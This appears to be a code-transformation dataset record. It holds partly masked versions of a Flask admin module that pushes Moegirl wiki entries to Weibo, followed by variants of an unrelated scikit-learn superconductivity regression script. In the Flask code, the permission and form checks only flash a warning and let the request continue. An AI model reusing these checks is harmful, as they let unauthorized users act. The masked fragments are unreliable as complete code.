BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if 
form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-3": "<mask token>\n\n\nclass UserList(MethodView):\n <mask token>\n\n def __init__(self):\n self.form = AddUserForm\n <mask token>\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False\n ).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({'status': 302, 'location': url_for(\n 'main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.\n username.data, role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination 
= BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-4": "<mask token>\n\n\nclass ManualUpdate(MethodView):\n <mask token>\n\n def __init__(self):\n self.form = PushForm\n\n def get(self):\n return render_template('main/mupdate.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n if not current_user.can(Permission.MANUAL_PUSH):\n flash(u'你没有权限')\n form = self.form(request.form)\n if not form.validate():\n flash(u'条目格式有问题,请检查并重新填写')\n title = form.pushtitle.data\n result = self.check_push_validate(title.encode('utf-8'))\n if not result:\n flash(u'推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表')\n try:\n image = MoegirlImage(title)\n except HTTPError as e:\n flash(u'请求萌百错误,错误码如下{},请联系管理员'.format(e))\n return redirect(url_for('main.mupdate'))\n if not image.path:\n flash(u'无法取得图片,请重试')\n entry = WaitingQueue(title=title, image=image.path)\n env = Env()\n current_weight = env.get('CUTTING_WEIGHT_INIT')\n entry.cutting_weight = current_weight + 1\n entry.save()\n env.set('CUTTING_WEIGHT_INIT', entry.cutting_weight)\n UserOperation(user_id=current_user.id, title=title, operation=\n Operation.PUSH).save()\n if form.industry.data:\n try:\n from koushihime.crontab import push\n push()\n except Exception as e:\n flash(u'推送失败: {}'.format(str(e)))\n flash(u'操作成功,词条将立即推送')\n return redirect(url_for('main.mupdate'))\n\n @staticmethod\n def check_push_validate(title):\n moegirl_entry = MoegirlQuery(title)\n namespace = moegirl_entry.get_namespace()\n if namespace is 0:\n baned_from_moegirl = moegirl_entry.banned_moegirl_category()\n baned_from_regex = moegirl_entry.ban_from_regex()\n has_pushed = recent_have_pushed(title.decode('utf-8'))\n has_catched = have_auto_catched(title.decode('utf-8'))\n result = (baned_from_moegirl is False and has_pushed is False and\n has_catched is False and baned_from_regex is False)\n return result\n else:\n return False\n\n\nclass UserInfo(MethodView):\n decorators = [login_required]\n\n def get(self, username):\n is_admin = current_user.can(Permission.ADMINISTER)\n if current_user.username == username or is_admin is True:\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if not user_info:\n abort(404)\n return render_template('main/user.html', u=user_info, username=\n user_info.username)\n else:\n abort(403)\n\n\nclass UserList(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = AddUserForm\n\n def get(self):\n userlist = User.query.filter_by(deleted=False).all()\n return render_template('main/userlist.html', userlist=userlist,\n form=self.form())\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False\n ).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({'status': 302, 'location': url_for(\n 'main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.\n username.data, role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = 
AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n 
flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport urllib\nfrom urllib2 import HTTPError\nfrom datetime import datetime\nfrom flask.views import MethodView\nfrom flask.ext.login import current_user, login_required\nfrom flask.ext.paginate import Pagination as PaginationBar\nfrom flask import render_template, redirect, url_for, request, jsonify, flash, current_app, abort\nfrom koushihime.auth.models import UserOperation, User, Role\nfrom koushihime.auth.constants import Permission, Operation\nfrom koushihime.utils import Pagination, admin_required, Env\nfrom koushihime.utils.moegirl import MoegirlQuery, MoegirlImage\nfrom . import main\nfrom utils import recent_have_pushed, have_auto_catched\nfrom models import WaitingQueue, BanList, RulePushCount\nfrom forms import PushForm, AddUserForm, EditProfileForm, AdminEditProfileForm, BanKeywordForm, CookieForm\n\n\n@main.before_request\ndef before_request():\n if current_user.is_anonymous:\n return redirect(url_for('auth.login'))\n elif current_user.is_blocked:\n return render_template('main/auth/block.html')\n else:\n current_user.last_seen = datetime.utcnow()\n current_user.save()\n\n\nclass Index(MethodView):\n\n def get(self):\n if not current_user:\n return redirect(url_for(\"auth.login\"))\n config = current_app.config[\"WEIBO_AUTH_CONFIG\"]\n callback = urllib.quote(config[\"CALLBACK\"])\n app_key = config[\"APP_KEY\"]\n return render_template('main/index.html', callback=callback, app_key=app_key)\n\n\nclass Update(MethodView):\n decorators = [login_required]\n\n def get(self, page):\n per_page = 10\n unpushed_entry = WaitingQueue.query.order_by(WaitingQueue.cutting_weight.desc()).all()\n pagination = Pagination(unpushed_entry, per_page)\n current_page = pagination.page(page)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=True, page=page,\n per_page=per_page, total=len(unpushed_entry),\n format_total=True, format_number=True)\n result = {\n \"titles\": current_page,\n \"current_time\": datetime.utcnow(),\n \"pushtime\": 10,\n \"deltime\": 999,\n \"page\": page,\n \"per_page\": per_page,\n \"pagination\": foot_bar\n }\n return render_template('main/update.html', **result)\n\n def post(self, page):\n data = request.get_json()\n if data['action'] == 'post':\n title = data[\"title\"]\n env = Env()\n current_weight = env.get(\"CUTTING_WEIGHT_INIT\")\n entry = WaitingQueue.query.filter_by(title=title).first()\n if entry:\n entry.cutting_weight = current_weight + 1 # FIXME: 即使条目处于权重最高状态亦可增加权限\n entry.save()\n env.set(\"CUTTING_WEIGHT_INIT\", entry.cutting_weight)\n elif data['action'] == 'del':\n title = data['title']\n UserOperation(user_id=current_user.id, operation=Operation.DELETE, title=title).save()\n query = WaitingQueue.query.filter_by(title=data['title']).first()\n if query:\n query.delete()\n response = jsonify({'result': True})\n return response\n\n\nclass ManualUpdate(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = PushForm\n\n def get(self):\n return render_template('main/mupdate.html', form=self.form(), pushtime=10)\n\n def post(self):\n if not current_user.can(Permission.MANUAL_PUSH):\n flash(u\"你没有权限\")\n\n form = self.form(request.form)\n if not form.validate():\n flash(u\"条目格式有问题,请检查并重新填写\")\n\n title = form.pushtitle.data\n result = self.check_push_validate(title.encode(\"utf-8\"))\n if not result:\n flash(u\"推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表\")\n\n try:\n image = MoegirlImage(title)\n except HTTPError as e:\n flash(u\"请求萌百错误,错误码如下{},请联系管理员\".format(e))\n 
return redirect(url_for('main.mupdate'))\n if not image.path:\n flash(u\"无法取得图片,请重试\")\n\n entry = WaitingQueue(title=title, image=image.path)\n env = Env()\n current_weight = env.get(\"CUTTING_WEIGHT_INIT\")\n entry.cutting_weight = current_weight + 1\n entry.save()\n env.set(\"CUTTING_WEIGHT_INIT\", entry.cutting_weight)\n UserOperation(user_id=current_user.id, title=title, operation=Operation.PUSH).save()\n if form.industry.data:\n try:\n from koushihime.crontab import push\n push()\n except Exception as e:\n flash(u\"推送失败: {}\".format(str(e)))\n flash(u\"操作成功,词条将立即推送\")\n return redirect(url_for('main.mupdate'))\n\n @staticmethod\n def check_push_validate(title):\n moegirl_entry = MoegirlQuery(title)\n namespace = moegirl_entry.get_namespace()\n if namespace is 0:\n baned_from_moegirl = moegirl_entry.banned_moegirl_category()\n baned_from_regex = moegirl_entry.ban_from_regex()\n has_pushed = recent_have_pushed(title.decode(\"utf-8\")) # TODO: 改成自动冒泡\n has_catched = have_auto_catched(title.decode(\"utf-8\"))\n result = baned_from_moegirl is False \\\n and has_pushed is False \\\n and has_catched is False \\\n and baned_from_regex is False\n return result\n else:\n return False\n\n\nclass UserInfo(MethodView):\n decorators = [login_required]\n\n def get(self, username):\n is_admin = current_user.can(Permission.ADMINISTER)\n if current_user.username == username or is_admin is True:\n user_info = User.query.filter_by(username=username, deleted=False).first()\n if not user_info:\n abort(404)\n return render_template('main/user.html', u=user_info, username=user_info.username)\n else:\n abort(403)\n\n\nclass UserList(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = AddUserForm\n\n def get(self):\n userlist = User.query.filter_by(deleted=False).all()\n return render_template('main/userlist.html', userlist=userlist, form=self.form())\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({\"status\": 302, \"location\": url_for('main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.username.data,\n role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username: # 用户访问自己的个人信息编辑页\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n else:\n if current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, 
u=current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n else:\n if current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc())\\\n .paginate(page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page,\n total=count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items,\n page=page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n # TODO: 把关键词读入配置减少查询次数\n pagination = BanList.query.filter_by(deleted=False)\\\n .paginate(page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page,\n total=count, format_total=True, format_number=True)\n template_param = {\n 'keywords': pagination.items,\n 'page': page,\n 'per_page': per_page,\n 'pagination': foot_bar,\n 'form': self.form()\n }\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({\"status\": 302, \"location\": url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit)\n status.save()\n flash(u'添加关键词成功')\n else:\n if exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\n# TODO: deprecated\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get(\"code\")\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return 
render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n # config = current_app.config[\"WEIBO_AUTH_CONFIG\"]\n # callback = config[\"CALLBACK\"]\n # app_key = config[\"APP_KEY\"]\n # app_secret_key = config[\"APP_SECRET\"]\n try:\n pass\n # client = APIClient(app_key=app_key, app_secret=app_secret_key, redirect_uri=callback)\n # token_data = client.request_access_token(self.auth_code)\n # access_token, expires_in = token_data.access_token, token_data.expires_in\n except BaseException as e:\n return e\n # config[\"ACCESS_TOKEN\"] = access_token\n # config[\"EXPIRE_TIME\"] = expires_in\n # env = Env()\n # env.set(\"ACCESS_TOKEN\", access_token)\n # env = Env()\n # env.set(\"EXPIRE_TIME\", expires_in)\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(), pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u\"表单不合法\")\n cookie = form.cookie.data\n env = Env()\n env.set(\"COOKIE\", cookie)\n flash(u\"设置 Cookie 成功\")\n return redirect(url_for('main.cookie'))\n",
"step-ids": [
17,
24,
27,
37,
47
]
}
|
[
17,
24,
27,
37,
47
] |
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
    X = df[columns[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
    X = df[columns[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
<|reserved_special_token_0|>
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
    X = df[columns[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
df, col = read_atomic_data('unique_m.csv')
X_train, X_test, y_train, y_test = get_dataset(df, col)
<|reserved_special_token_0|>
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import BayesianRidge, LinearRegression
import os
import sys
import sklearn.metrics as mets
from review import set_metrics as set_metrics
from algo import Regression
import draw
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
    X = df[columns[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
df, col = read_atomic_data('unique_m.csv')
X_train, X_test, y_train, y_test = get_dataset(df, col)
from sklearn import preprocessing
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
import pandas as pd
from sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier
from sklearn.model_selection import train_test_split # Import train_test_split function
from sklearn import metrics #Import scikit-learn metrics module for accuracy calculation
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import BayesianRidge, LinearRegression
import os
import sys
import sklearn.metrics as mets
from review import set_metrics as set_metrics
from algo import Regression
import draw
#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution
#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/
#https://datascienceplus.com/keras-regression-based-neural-networks/
#xgboost
#random forest
#lstm
#rnn
#dec tree
#logistic regression
#ann
#naive bayes
#monte carlo
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print("To begin with, your path to data should be proper!")
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist() # get the columns
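    # drop the last column -- in the superconductivity CSV this is presumably
    # the non-numeric 'material' label, which the regressors below cannot use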
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
    X = df[columns[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
return (X_train, X_test, y_train, y_test)
df, col = read_atomic_data("unique_m.csv")
(X_train, X_test, y_train, y_test) = get_dataset(df, col)
from sklearn import preprocessing
